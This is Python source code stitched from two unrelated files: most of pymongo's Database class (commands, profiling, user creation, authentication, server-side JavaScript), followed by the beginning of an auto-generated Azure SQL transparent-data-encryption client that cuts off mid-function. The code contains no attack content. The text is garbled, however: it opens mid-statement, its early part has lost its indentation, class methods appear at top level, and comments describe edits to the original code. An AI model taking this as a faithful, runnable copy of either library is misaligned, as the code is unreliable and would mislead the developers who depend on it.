write_concern or client.write_concern)
if not isinstance(name, string_type):
raise TypeError("name must be an instance "
"of %s" % (string_type.__name__,))
if name != '$external':
_check_name(name)
self.__name = _unicode(name)
self.__client = client
self.__incoming_manipulators = []
self.__incoming_copying_manipulators = []
self.__outgoing_manipulators = []
self.__outgoing_copying_manipulators = []
def add_son_manipulator(self, manipulator):
"""Add a new son manipulator to this database.
**DEPRECATED** - `add_son_manipulator` is deprecated.
.. versionchanged:: 3.0
Deprecated add_son_manipulator.
"""
warnings.warn("add_son_manipulator is deprecated",
DeprecationWarning, stacklevel=2)
base = SONManipulator()
def method_overwritten(instance, method):
"""Test if this method has been overridden."""
return (getattr(
instance, method).__func__ != getattr(base, method).__func__)
if manipulator.will_copy():
if method_overwritten(manipulator, "transform_incoming"):
self.__incoming_copying_manipulators.insert(0, manipulator)
if method_overwritten(manipulator, "transform_outgoing"):
self.__outgoing_copying_manipulators.insert(0, manipulator)
else:
if method_overwritten(manipulator, "transform_incoming"):
self.__incoming_manipulators.insert(0, manipulator)
if method_overwritten(manipulator, "transform_outgoing"):
self.__outgoing_manipulators.insert(0, manipulator)
@property
def system_js(self):
"""A :class:`SystemJS` helper for this :class:`Database`.
See the documentation for :class:`SystemJS` for more details.
"""
return SystemJS(self)
@property
def client(self):
"""The client instance for this :class:`Database`."""
return self.__client
@property
def name(self):
"""The name of this :class:`Database`."""
return self.__name
@property
def incoming_manipulators(self):
"""All incoming SON manipulators installed on this instance.
.. versionadded:: 2.0
"""
return [manipulator.__class__.__name__
for manipulator in self.__incoming_manipulators]
@property
def incoming_copying_manipulators(self):
"""All incoming SON copying manipulators installed on this instance.
.. versionadded:: 2.0
"""
return [manipulator.__class__.__name__
for manipulator in self.__incoming_copying_manipulators]
@property
def outgoing_manipulators(self):
"""List all outgoing SON manipulators
installed on this instance.
.. versionadded:: 2.0
"""
return [manipulator.__class__.__name__
for manipulator in self.__outgoing_manipulators]
@property
def outgoing_copying_manipulators(self):
"""List all outgoing SON copying manipulators
installed on this instance.
.. versionadded:: 2.0
"""
return [manipulator.__class__.__name__
for manipulator in self.__outgoing_copying_manipulators]
def __eq__(self, other):
if isinstance(other, Database):
return (self.__client == other.client and
self.__name == other.name)
return NotImplemented
def __ne__(self, other):
return not self == other
def __repr__(self):
return "Database(%r, %r)" % (self.__client, self.__name)
def __getattr__(self, name):
"""Get a collection of this database by name.
Raises InvalidName if an invalid collection name is used.
:Parameters:
- `name`: the name of the collection to get
"""
if name.startswith('_'):
raise AttributeError(
"Database has no attribute %r. To access the %s"
" collection, use database[%r]." % (name, name, name))
return self.__getitem__(name)
def __getitem__(self, name):
"""Get a collection of this database by name.
Raises InvalidName if an invalid collection name is used.
:Parameters:
- `name`: the name of the collection to get
"""
return Collection(self, name)
def get_collection(self, name, codec_options=None,
read_preference=None, write_concern=None):
"""Get a :class:`~pymongo.collection.Collection` with the given name
and options.
Useful for creating a :class:`~pymongo.collection.Collection` with
different codec options, read preference, and/or write concern from
this :class:`Database`.
>>> db.read_preference
Primary()
>>> coll1 = db.test
>>> coll1.read_preference
Primary()
>>> from pymongo import ReadPreference
>>> coll2 = db.get_collection(
... 'test', read_preference=ReadPreference.SECONDARY)
>>> coll2.read_preference
Secondary(tag_sets=None)
:Parameters:
- `name`: The name of the collection - a string.
- `codec_options` (optional): An instance of
:class:`~bson.codec_options.CodecOptions`. If ``None`` (the
default) the :attr:`codec_options` of this :class:`Database` is
used.
- `read_preference` (optional): The read preference to use. If
``None`` (the default) the :attr:`read_preference` of this
:class:`Database` is used. See :mod:`~pymongo.read_preferences`
for options.
- `write_concern` (optional): An instance of
:class:`~pymongo.write_concern.WriteConcern`. If ``None`` (the
default) the :attr:`write_concern` of this :class:`Database` is
used.
"""
return Collection(
self, name, False, codec_options, read_preference, write_concern)
def create_collection(self, name, codec_options=None,
read_preference=None, write_concern=None, **kwargs):
"""Create a new :class:`~pymongo.collection.Collection` in this
database.
Normally collection creation is automatic. This method should
only be used to specify options on
creation. :class:`~pymongo.errors.CollectionInvalid` will be
raised if the collection already exists.
Options should be passed as keyword arguments to this method. Supported
options vary with MongoDB release. Some examples include:
- "size": desired initial size for the collection (in
bytes). For capped collections this size is the max
size of the collection.
- "capped": if True, this is a capped collection
- "max": maximum number of objects if capped (optional)
See the MongoDB documentation for a full list of supported options by
server version.
:Parameters:
- `name`: the name of the collection to create
- `codec_options` (optional): An instance of
:class:`~bson.codec_options.CodecOptions`. If ``None`` (the
default) the :attr:`codec_options` of this :class:`Database` is
used.
- `read_preference` (optional): The read preference to use. If
``None`` (the default) the :attr:`read_preference` of this
:class:`Database` is used.
- `write_concern` (optional): An instance of
:class:`~pymongo.write_concern.WriteConcern`. If ``None`` (the
default) the :attr:`write_concern` of this :class:`Database` is
used.
- `**kwargs` (optional): additional keyword arguments will
be passed as options for the create collection command
.. versionchanged:: 3.0
Added the codec_options, read_preference, and write_concern options.
.. versionchanged:: 2.2
Removed deprecated argument: options
"""
if name in self.collection_names():
raise CollectionInvalid("collection %s already exists" % name)
return Collection(self, name, True, codec_options,
read_preference, write_concern, **kwargs)
def _apply_incoming_manipulators(self, son, collection):
    """Run every registered incoming manipulator over `son`, in
    registration order, and return the transformed document."""
    doc = son
    for manipulator in self.__incoming_manipulators:
        doc = manipulator.transform_incoming(doc, collection)
    return doc
def _apply_incoming_copying_manipulators(self, son, collection):
    """Run every registered incoming *copying* manipulator over `son`,
    in registration order, and return the transformed document."""
    doc = son
    for manipulator in self.__incoming_copying_manipulators:
        doc = manipulator.transform_incoming(doc, collection)
    return doc
def _fix_incoming(self, son, collection):
    """Apply all incoming manipulators to `son` before it is stored.

    Plain manipulators run first, then copying manipulators.

    :Parameters:
      - `son`: the son object going into the database
      - `collection`: the collection the son object is being saved in
    """
    transformed = self._apply_incoming_manipulators(son, collection)
    return self._apply_incoming_copying_manipulators(transformed, collection)
def _fix_outgoing(self, son, collection):
    """Apply manipulators to a SON object as it comes out of the database.

    :Parameters:
      - `son`: the son object coming out of the database
      - `collection`: the collection the son object was saved in
    """
    # Outgoing manipulators run in reverse registration order (plain
    # manipulators first, then copying ones), mirroring the incoming pass.
    for chain in (self.__outgoing_manipulators,
                  self.__outgoing_copying_manipulators):
        for manipulator in reversed(chain):
            son = manipulator.transform_outgoing(son, collection)
    return son
def _command(self, sock_info, command, slave_ok=False, value=1, check=True,
             allowable_errors=None, read_preference=ReadPreference.PRIMARY,
             codec_options=CodecOptions(), **kwargs):
    """Internal command helper.

    Promotes a bare command name to a ``{name: value}`` document, merges
    any extra keyword arguments into the command, and runs it on the
    given socket.
    """
    spec = command
    if isinstance(spec, string_type):
        # SON preserves key order; the command "verb" must come first.
        spec = SON([(spec, value)])
    spec.update(kwargs)
    return sock_info.command(
        self.__name, spec, slave_ok, read_preference, codec_options,
        check, allowable_errors)
def command(self, command, value=1, check=True,
            allowable_errors=None, read_preference=ReadPreference.PRIMARY,
            codec_options=CodecOptions(), **kwargs):
    """Issue a MongoDB command.

    Send `command` to the database and return the response. If `command`
    is a string (``basestring`` in python 2), the document
    ``{command: value}`` is sent; otherwise `command` must be a mapping
    and is sent as is. Extra keyword arguments are merged into the final
    command document before it is sent.

    Examples::

        >>> db.command("buildinfo")
        >>> db.command("collstats", collection_name)
        >>> db.command("filemd5", object_id, root=file_root)

    :Parameters:
      - `command`: document representing the command to be issued, or the
        name of the command (for simple commands only).

        .. note:: the order of keys in the `command` document is
           significant (the "verb" must come first), so commands
           which require multiple keys (e.g. `findandmodify`)
           should use an instance of :class:`~bson.son.SON` or
           a string and kwargs instead of a Python `dict`.

      - `value` (optional): value to use for the command verb when
        `command` is passed as a string
      - `check` (optional): check the response for errors, raising
        :class:`~pymongo.errors.OperationFailure` if there are any
      - `allowable_errors`: if `check` is ``True``, error messages
        in this list will be ignored by error-checking
      - `read_preference`: The read preference for this operation.
      - `codec_options`: A :class:`~bson.codec_options.CodecOptions`
        instance.
      - `**kwargs` (optional): additional keyword arguments added to the
        command document before it is sent

    .. note:: :meth:`command` does **not** obey :attr:`read_preference`
       or :attr:`codec_options`. You must use the `read_preference` and
       `codec_options` parameters instead.

    .. versionchanged:: 3.0
       Removed the `as_class`, `fields`, `uuid_subtype`, `tag_sets`,
       `secondary_acceptable_latency_ms` and `compile_re` options; added
       the `codec_options` parameter.

    .. mongodoc:: commands
    """
    # Check out a socket honoring the requested read preference and
    # delegate to the internal helper.
    with self.__client._socket_for_reads(
            read_preference) as (sock_info, slave_ok):
        return self._command(sock_info, command, slave_ok, value,
                             check, allowable_errors, read_preference,
                             codec_options, **kwargs)
def _list_collections(self, sock_info, slave_okay, criteria=None):
    """Internal listCollections helper.

    Returns a :class:`~pymongo.command_cursor.CommandCursor` over
    collection-info documents, emulating the listCollections command on
    servers too old to support it.
    """
    criteria = criteria or {}
    if sock_info.max_wire_version > 2:
        # MongoDB >= 2.8: a real listCollections command with a cursor.
        cmd = SON([("listCollections", 1), ("cursor", {})])
        if criteria:
            cmd["filter"] = criteria
        coll = self["$cmd"]
        result = self._command(sock_info, cmd, slave_okay)
        return CommandCursor(coll, result["cursor"], sock_info.address)
    # Older servers: query system.namespaces directly and wrap the reply
    # in a fake cursor document.
    coll = self["system.namespaces"]
    res = _first_batch(sock_info, coll.full_name,
                       criteria, 0, slave_okay,
                       CodecOptions(), ReadPreference.PRIMARY)
    first = res["data"]
    fake_cursor = {
        "id": res["cursor_id"],
        "firstBatch": first,
        "ns": coll.full_name,
    }
    # The cursor must be told how many docs were in the first batch.
    return CommandCursor(coll, fake_cursor, sock_info.address, len(first))
def collection_names(self, include_system_collections=True):
    """Get a list of all the collection names in this database.

    :Parameters:
      - `include_system_collections` (optional): if ``False`` the result
        will not include system collections (e.g ``system.indexes``)
    """
    with self.__client._socket_for_reads(
            ReadPreference.PRIMARY) as (sock_info, slave_okay):
        names = [doc["name"]
                 for doc in self._list_collections(sock_info, slave_okay)]
        if sock_info.max_wire_version <= 2:
            # MongoDB 2.4 and older return index namespaces and collection
            # namespaces prefixed with the database name; strip the prefix
            # and drop index entries (their names contain "$").
            prefix = self.__name + "."
            names = [n[len(prefix):] for n in names
                     if n.startswith(prefix) and "$" not in n]
        if not include_system_collections:
            names = [n for n in names if not n.startswith("system.")]
        return names
def drop_collection(self, name_or_collection):
    """Drop a collection.

    :Parameters:
      - `name_or_collection`: the name of a collection to drop or the
        collection object itself
    """
    target = name_or_collection
    if isinstance(target, Collection):
        target = target.name
    if not isinstance(target, string_type):
        raise TypeError("name_or_collection must be an "
                        "instance of %s" % (string_type.__name__,))
    # Discard any cached index information before the server-side drop.
    self.__client._purge_index(self.__name, target)
    # "ns not found" means the collection never existed; that is fine.
    self.command("drop", _unicode(target), allowable_errors=["ns not found"])
def validate_collection(self, name_or_collection,
                        scandata=False, full=False):
    """Validate a collection.

    Returns a dict of validation info. Raises
    :class:`~pymongo.errors.CollectionInvalid` if validation fails.

    With MongoDB < 1.9 the result dict will include a `result` key
    with a string value that represents the validation results. With
    MongoDB >= 1.9 the `result` key no longer exists and the results
    are split into individual fields in the result dict.

    :Parameters:
      - `name_or_collection`: A Collection object or the name of a
        collection to validate.
      - `scandata`: Do extra checks beyond checking the overall
        structure of the collection.
      - `full`: Have the server do a more thorough scan of the
        collection. Use with `scandata` for a thorough scan
        of the structure of the collection and the individual
        documents. Ignored in MongoDB versions before 1.9.
    """
    name = name_or_collection
    if isinstance(name, Collection):
        name = name.name
    if not isinstance(name, string_type):
        raise TypeError("name_or_collection must be an instance of "
                        "%s or Collection" % (string_type.__name__,))
    result = self.command("validate", _unicode(name),
                          scandata=scandata, full=full)
    valid = True
    # Pre 1.9 servers report everything in a single free-form string.
    # (Idiomatic membership test replaces the old `.find(...) != -1`.)
    if "result" in result:
        info = result["result"]
        if "exception" in info or "corrupt" in info:
            raise CollectionInvalid("%s invalid: %s" % (name, info))
    # Sharded clusters return one sub-result per shard under "raw".
    elif "raw" in result:
        for _, res in iteritems(result["raw"]):
            if "result" in res:
                info = res["result"]
                if "exception" in info or "corrupt" in info:
                    raise CollectionInvalid("%s invalid: "
                                            "%s" % (name, info))
            elif not res.get("valid", False):
                valid = False
                break
    # Post 1.9 non-sharded results.
    elif not result.get("valid", False):
        valid = False
    if not valid:
        raise CollectionInvalid("%s invalid: %r" % (name, result))
    return result
def current_op(self, include_all=False):
    """Get information on operations currently running.

    :Parameters:
      - `include_all` (optional): if ``True`` also list currently
        idle operations in the result
    """
    # $cmd.sys.inprog is a virtual collection; reading it reports
    # in-progress operations. Always read from the primary.
    coll = self.get_collection(
        "$cmd.sys.inprog", read_preference=ReadPreference.PRIMARY)
    if not include_all:
        return coll.find_one()
    # {"$all": True} asks the server to include idle operations too.
    return coll.find_one({"$all": True})
def profiling_level(self):
    """Get the database's current profiling level.

    Returns one of (:data:`~pymongo.OFF`,
    :data:`~pymongo.SLOW_ONLY`, :data:`~pymongo.ALL`).

    .. mongodoc:: profiling
    """
    # Passing -1 to the profile command reads the level without changing it.
    level = self.command("profile", -1)["was"]
    # Server levels: 0 = OFF, 1 = SLOW_ONLY, 2 = ALL.
    assert 0 <= level <= 2
    return level
def set_profiling_level(self, level, slow_ms=None):
    """Set the database's profiling level.

    :Parameters:
      - `level`: the profiling level: :data:`~pymongo.OFF` (off),
        :data:`~pymongo.SLOW_ONLY` (only slow operations), or
        :data:`~pymongo.ALL` (all operations).
      - `slow_ms`: Optionally modify the threshold for the profile to
        consider a query or operation. Even if the profiler is off queries
        slower than the `slow_ms` level will get written to the logs.

    Raises :class:`ValueError` if level is not one of
    (:data:`~pymongo.OFF`, :data:`~pymongo.SLOW_ONLY`,
    :data:`~pymongo.ALL`).

    .. mongodoc:: profiling
    """
    # Validate before touching the server.
    if not isinstance(level, int) or not 0 <= level <= 2:
        raise ValueError("level must be one of (OFF, SLOW_ONLY, ALL)")
    if slow_ms is not None and not isinstance(slow_ms, int):
        raise TypeError("slow_ms must be an integer")
    if slow_ms is None:
        self.command("profile", level)
    else:
        self.command("profile", level, slowms=slow_ms)
def profiling_info(self):
    """Returns a list containing current profiling information.

    .. mongodoc:: profiling
    """
    # Profile entries are recorded in the system.profile collection.
    cursor = self["system.profile"].find()
    return list(cursor)
def error(self):
    """**DEPRECATED**: Get the error if one occurred on the last operation.

    This method is obsolete: all MongoDB write operations (insert, update,
    remove, and so on) use the write concern ``w=1`` and report their
    errors by default.

    .. versionchanged:: 2.8
       Deprecated.
    """
    warnings.warn("Database.error() is deprecated",
                  DeprecationWarning, stacklevel=2)
    response = self.command("getlasterror")
    message = response.get("err", "")
    if message is None:
        # No error on the last operation.
        return None
    if message.startswith("not master"):
        # Losing the primary invalidates our topology view; request a
        # server check unless another thread is already doing so.
        primary = self.__client.primary
        if primary:
            self.__client._reset_server_and_request_check(primary)
    return response
def last_status(self):
    """**DEPRECATED**: Get status information from the last operation.

    This method is obsolete: all MongoDB write operations (insert, update,
    remove, and so on) use the write concern ``w=1`` and report their
    errors by default.

    Returns a SON object with status information.

    .. versionchanged:: 2.8
       Deprecated.
    """
    warnings.warn("last_status() is deprecated",
                  DeprecationWarning, stacklevel=2)
    # getlasterror reports the outcome of the last write on this connection.
    return self.command("getlasterror")
def previous_error(self):
    """**DEPRECATED**: Get the most recent error on this database.

    This method is obsolete: all MongoDB write operations (insert, update,
    remove, and so on) use the write concern ``w=1`` and report their
    errors by default.

    Only returns errors that have occurred since the last call to
    :meth:`reset_error_history`. Returns None if no such errors have
    occurred.

    .. versionchanged:: 2.8
       Deprecated.
    """
    warnings.warn("previous_error() is deprecated",
                  DeprecationWarning, stacklevel=2)
    state = self.command("getpreverror")
    # A null "err" field means no error has been recorded.
    return None if state.get("err", 0) is None else state
def reset_error_history(self):
    """**DEPRECATED**: Reset the error history of this database.

    This method is obsolete: all MongoDB write operations (insert, update,
    remove, and so on) use the write concern ``w=1`` and report their
    errors by default.

    Calls to :meth:`previous_error` will only return errors that have
    occurred since the most recent call to this method.

    .. versionchanged:: 2.8
       Deprecated.
    """
    warnings.warn("reset_error_history() is deprecated",
                  DeprecationWarning, stacklevel=2)
    # Server-side command; clears the state read by getpreverror.
    self.command("reseterror")
def __iter__(self):
    # Databases are not iterable; __iter__/__next__ exist only so that
    # attempts to iterate fail with a clear TypeError (see __next__).
    return self

def __next__(self):
    raise TypeError("'Database' object is not iterable")

# Python 2 spelling of the iterator protocol method.
next = __next__
def _default_role(self, read_only):
    """Return the default user role for this database.

    The admin database grants server-wide roles; every other database
    gets a role scoped to itself.
    """
    if self.name == "admin":
        return "readAnyDatabase" if read_only else "root"
    return "read" if read_only else "dbOwner"
def _create_or_update_user(
        self, create, name, password, read_only, **kwargs):
    """Use a command to create (if create=True) or modify a user.

    :Parameters:
      - `create`: ``True`` to run createUser, ``False`` to run updateUser
      - `name`: the user name
      - `password`: plain-text password, hashed client side, or ``None``
      - `read_only`: if truthy, assign the database's default read role
      - `**kwargs`: extra options merged into the command document
    """
    opts = {}
    if read_only or (create and "roles" not in kwargs):
        warnings.warn("Creating a user with the read_only option "
                      "or without roles is deprecated in MongoDB "
                      ">= 2.6", DeprecationWarning)
        opts["roles"] = [self._default_role(read_only)]
    # NOTE: a former `elif read_only:` branch (warning that read_only is
    # deprecated in favor of roles) was unreachable -- any truthy
    # read_only already takes the branch above -- and has been removed.
    if password is not None:
        # We always salt and hash client side.
        if "digestPassword" in kwargs:
            raise ConfigurationError("The digestPassword option is not "
                                     "supported via add_user. Please use "
                                     "db.command('createUser', ...) "
                                     "instead for this option.")
        opts["pwd"] = auth._password_digest(name, password)
        opts["digestPassword"] = False
    # Don't send {} as writeConcern.
    if self.write_concern.acknowledged and self.write_concern.document:
        opts["writeConcern"] = self.write_concern.document
    opts.update(kwargs)
    self.command("createUser" if create else "updateUser", name, **opts)
def _legacy_add_user(self, name, password, read_only, **kwargs):
    """Uses v1 system to add users, i.e. saving to system.users."""
    # Start from the existing user document, if any.
    user = self.system.users.find_one({"user": name}) or {"user": name}
    if password is not None:
        user["pwd"] = auth._password_digest(name, password)
    if read_only is not None:
        user["readOnly"] = read_only
    user.update(kwargs)
    # replace_one(..., upsert=True) below needs an _id; any value will do.
    user.setdefault("_id", ObjectId())
    coll = self.system.users
    if not self.write_concern.acknowledged:
        coll = coll.with_options(write_concern=WriteConcern())
    try:
        coll.replace_one({"_id": user["_id"]}, user, True)
    except OperationFailure as exc:
        details = exc.details or {}
        if 'login' in str(exc):
            # First admin user add fails gle in MongoDB >= 2.1.2
            # (SERVER-4225); benign.
            pass
        elif 'getlasterror' in details.get('note', ''):
            # First admin user add fails gle from mongos 2.0.x and
            # 2.2.x; also benign.
            pass
        else:
            raise
def add_user(self, name, password=None, read_only=None, **kwargs):
    """Create user `name` with password `password`.

    Add a new user with permissions for this :class:`Database`.

    .. note:: Will change the password if user `name` already exists.

    :Parameters:
      - `name`: the name of the user to create
      - `password` (optional): the password of the user to create. Can not
        be used with the ``userSource`` argument.
      - `read_only` (optional): if ``True`` the user will be read only
      - `**kwargs` (optional): optional fields for the user document
        (e.g. ``userSource``, ``otherDBRoles``, or ``roles``). See
        `<http://docs.mongodb.org/manual/reference/privilege-documents>`_
        for more information.

    .. note:: The use of optional keyword arguments like ``userSource``,
       ``otherDBRoles``, or ``roles`` requires MongoDB >= 2.4.0

    .. versionchanged:: 2.5
       Added kwargs support for optional fields introduced in MongoDB 2.4
    .. versionchanged:: 2.2
       Added support for read only users
    """
    if not isinstance(name, string_type):
        raise TypeError("name must be an "
                        "instance of %s" % (string_type.__name__,))
    if password is not None:
        if not isinstance(password, string_type):
            raise TypeError("password must be an "
                            "instance of %s" % (string_type.__name__,))
        if not password:
            raise ValueError("password can't be empty")
    if read_only is not None:
        read_only = common.validate_boolean('read_only', read_only)
        if 'roles' in kwargs:
            raise ConfigurationError("Can not use "
                                     "read_only and roles together")
    try:
        uinfo = self.command("usersInfo", name)
        # An empty "users" array means we must create rather than update.
        self._create_or_update_user(
            (not uinfo["users"]), name, password, read_only, **kwargs)
    except OperationFailure as exc:
        if exc.code in common.COMMAND_NOT_FOUND_CODES:
            # MongoDB < 2.5.3 has no user-management commands; fall
            # back to writing system.users directly.
            self._legacy_add_user(name, password, read_only, **kwargs)
        elif exc.code == 13:
            # Unauthorized. Attempt to create the user in case of
            # localhost exception.
            self._create_or_update_user(
                True, name, password, read_only, **kwargs)
        else:
            raise
def remove_user(self, name):
    """Remove user `name` from this :class:`Database`.

    User `name` will no longer have permissions to access this
    :class:`Database`.

    :Parameters:
      - `name`: the name of the user to remove
    """
    try:
        cmd = SON([("dropUser", name)])
        # Don't send {} as writeConcern.
        if self.write_concern.acknowledged and self.write_concern.document:
            cmd["writeConcern"] = self.write_concern.document
        self.command(cmd)
    except OperationFailure as exc:
        # Servers without user-management commands (< 2.5.3): delete the
        # document from system.users directly.
        if exc.code not in common.COMMAND_NOT_FOUND_CODES:
            raise
        coll = self.system.users
        if not self.write_concern.acknowledged:
            coll = coll.with_options(write_concern=WriteConcern())
        coll.delete_one({"user": name})
def authenticate(self, name, password=None,
                 source=None, mechanism='DEFAULT', **kwargs):
    """Authenticate to use this database.

    Authentication lasts for the life of the underlying client
    instance, or until :meth:`logout` is called.

    Raises :class:`TypeError` if (required) `name`, (optional) `password`,
    or (optional) `source` is not an instance of :class:`basestring`
    (:class:`str` in python 3).

    .. note::
      - This method authenticates the current connection and causes all
        new socket connections in the underlying client instance to be
        authenticated automatically.
      - Authenticating more than once on the same database with different
        credentials is not supported. You must call :meth:`logout` before
        authenticating with new credentials.
      - When sharing a client instance between multiple threads, all
        threads will share the authentication. If you need different
        authentication profiles for different purposes you must use
        distinct client instances.

    :Parameters:
      - `name`: the name of the user to authenticate.
      - `password` (optional): the password of the user to authenticate.
        Not used with GSSAPI or MONGODB-X509 authentication.
      - `source` (optional): the database to authenticate on. If not
        specified the current database is used.
      - `mechanism` (optional): See :data:`~pymongo.auth.MECHANISMS` for
        options. By default, use SCRAM-SHA-1 with MongoDB 3.0 and later,
        MONGODB-CR (MongoDB Challenge Response protocol) for older servers.
      - `authMechanismProperties` (optional): Used to specify
        authentication mechanism specific options. To specify the service
        name for GSSAPI authentication pass
        authMechanismProperties='SERVICE_NAME:<service name>'

    .. versionadded:: 2.8
       Use SCRAM-SHA-1 with MongoDB 3.0 and later.
    .. versionchanged:: 2.5
       Added the `source` and `mechanism` parameters. :meth:`authenticate`
       now raises a subclass of :class:`~pymongo.errors.PyMongoError` if
       authentication fails due to invalid credentials or configuration
       issues.

    .. mongodoc:: authenticate
    """
    if not isinstance(name, string_type):
        raise TypeError("name must be an "
                        "instance of %s" % (string_type.__name__,))
    if password is not None and not isinstance(password, string_type):
        raise TypeError("password must be an "
                        "instance of %s" % (string_type.__name__,))
    if source is not None and not isinstance(source, string_type):
        raise TypeError("source must be an "
                        "instance of %s" % (string_type.__name__,))
    common.validate_auth_mechanism('mechanism', mechanism)
    # Normalize and validate mechanism-specific options; each validator
    # returns a (normalized_name, value) pair.
    validated_options = dict(
        common.validate_auth_option(option, value)
        for option, value in iteritems(kwargs))
    credentials = auth._build_credentials_tuple(
        mechanism,
        source or self.name,
        name,
        password,
        validated_options)
    # Cache the credentials so every new socket in the client
    # authenticates automatically; connect=True authenticates now.
    self.client._cache_credentials(
        self.name,
        credentials,
        connect=True)
    return True
def logout(self):
    """Deauthorize use of this database for this client instance."""
    # Sockets are lazily deauthenticated the next time they are used.
    self.client._purge_credentials(self.name)
def dereference(self, dbref, **kwargs):
    """Dereference a :class:`~bson.dbref.DBRef`, getting the
    document it points to.

    Raises :class:`TypeError` if `dbref` is not an instance of
    :class:`~bson.dbref.DBRef`. Returns a document, or ``None`` if
    the reference does not point to a valid document. Raises
    :class:`ValueError` if `dbref` has a database specified that
    is different from the current database.

    :Parameters:
      - `dbref`: the reference
      - `**kwargs` (optional): any additional keyword arguments
        are the same as the arguments to
        :meth:`~pymongo.collection.Collection.find`.
    """
    if not isinstance(dbref, DBRef):
        raise TypeError("cannot dereference a %s" % type(dbref))
    # A DBRef may name its own database; we only follow references into
    # this database.
    if dbref.database is not None and dbref.database != self.__name:
        raise ValueError("trying to dereference a DBRef that points to "
                         "another database (%r not %r)" % (dbref.database,
                                                           self.__name))
    target = self[dbref.collection]
    return target.find_one({"_id": dbref.id}, **kwargs)
def eval(self, code, *args):
    """Evaluate a JavaScript expression in MongoDB.

    Useful if you need to touch a lot of data lightly; in such a
    scenario the network transfer of the data could be a
    bottleneck. The `code` argument must be a JavaScript
    function. Additional positional arguments will be passed to
    that function when it is run on the server.

    Raises :class:`TypeError` if `code` is not an instance of
    :class:`basestring` (:class:`str` in python 3) or `Code`.
    Raises :class:`~pymongo.errors.OperationFailure` if the eval
    fails. Returns the result of the evaluation.

    :Parameters:
      - `code`: string representation of JavaScript code to be
        evaluated
      - `args` (optional): additional positional arguments are
        passed to the `code` being evaluated
    """
    # Accept either a Code instance or raw JavaScript source.
    if not isinstance(code, Code):
        code = Code(code)
    return self.command("$eval", code, args=args).get("retval", None)
def __call__(self, *args, **kwargs):
    """This is only here so that some API misusages are easier to debug.
    """
    # A common mistake is db.method_name(...) when the method actually
    # lives on the client or a collection; include the attribute name the
    # caller reached for so the error message points at the real problem.
    raise TypeError("'Database' object is not callable. If you meant to "
                    "call the '%s' method on a '%s' object it is "
                    "failing because no such method exists." % (
                        self.__name, self.__client.__class__.__name__))
class SystemJS(object):
    """Helper class for dealing with stored JavaScript.
    """

    def __init__(self, database):
        """Get a system js helper for the database `database`.

        Normally obtained through :attr:`Database.system_js` rather than
        instantiated directly. Instances allow easy manipulation of
        server-side JavaScript: assigning an attribute stores a function,
        deleting removes it, and calling an attribute runs it server side.
        """
        # Stored-JS writes must be acknowledged; swap in a w=1 database
        # if the caller's is unacknowledged.
        if not database.write_concern.acknowledged:
            database = database.client.get_database(
                database.name, write_concern=WriteConcern())
        # __setattr__ is overridden below, so bypass it for our own state.
        object.__setattr__(self, "_db", database)

    def __setattr__(self, name, code):
        # Upsert the stored function under _id == name.
        self._db.system.js.replace_one(
            {"_id": name}, {"_id": name, "value": Code(code)}, True)

    def __setitem__(self, name, code):
        self.__setattr__(name, code)

    def __delattr__(self, name):
        self._db.system.js.delete_one({"_id": name})

    def __delitem__(self, name):
        self.__delattr__(name)

    def __getattr__(self, name):
        # Only reached for attributes not found normally; return a proxy
        # that invokes the stored function server side via eval.
        return lambda *args: self._db.eval(Code("function() { "
                                                "return this[name].apply("
                                                "this, arguments); }",
                                                scope={'name': name}), *args)

    def __getitem__(self, name):
        return self.__getattr__(name)

    def list(self):
        """Get a list of the names of the functions stored in this database."""
        return [doc["_id"]
                for doc in self._db.system.js.find(projection=["_id"])]
|
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.mgmt.core.exceptions import ARMErrorFormat
from msrest import Serializer
from .. import models as _models
from .._vendor import _convert_request, _format_url_section
# Generic type variable used by ClsType below.
T = TypeVar('T')
# Alias for arbitrary JSON-serializable payloads accepted by the builders.
JSONType = Any
# Optional callback applied to the raw pipeline response by operations.
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]

# Module-wide serializer for URL path, query, and header parameters.
_SERIALIZER = Serializer()
# Input validation is handled server side for generated request builders.
_SERIALIZER.client_side_validation = False
def build_get_request(
    resource_group_name: str,
    managed_instance_name: str,
    database_name: str,
    tde_name: Union[str, "_models.TransparentDataEncryptionName"],
    subscription_id: str,
    **kwargs: Any
) -> HttpRequest:
    """Build an HTTP GET request for a single transparent data encryption
    configuration of a managed database."""
    api_version = "2020-11-01-preview"
    accept = "application/json"

    # Fill the path template with serialized, URL-safe arguments.
    template = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql/managedInstances/{managedInstanceName}/databases/{databaseName}/transparentDataEncryption/{tdeName}')
    url = _format_url_section(template, **{
        "resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
        "managedInstanceName": _SERIALIZER.url("managed_instance_name", managed_instance_name, 'str'),
        "databaseName": _SERIALIZER.url("database_name", database_name, 'str'),
        "tdeName": _SERIALIZER.url("tde_name", tde_name, 'str'),
        "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
    })

    # Query string and headers; caller-supplied values are preserved.
    query_parameters = kwargs.pop("params", {})  # type: Dict[str, Any]
    query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
    header_parameters = kwargs.pop("headers", {})  # type: Dict[str, Any]
    header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')

    return HttpRequest(
        method="GET",
        url=url,
        params=query_parameters,
        headers=header_parameters,
        **kwargs
    )
def build_create_or_update_request(
    resource_group_name: str,
    managed_instance_name: str,
    database_name: str,
    tde_name: Union[str, "_models.TransparentDataEncryptionName"],
    subscription_id: str,
    *,
    json: JSONType = None,
    content: Any = None,
    **kwargs: Any
) -> HttpRequest:
    """Build an HTTP PUT request that creates or updates a managed
    database's transparent data encryption configuration."""
    content_type = kwargs.pop('content_type', None)  # type: Optional[str]
    api_version = "2020-11-01-preview"
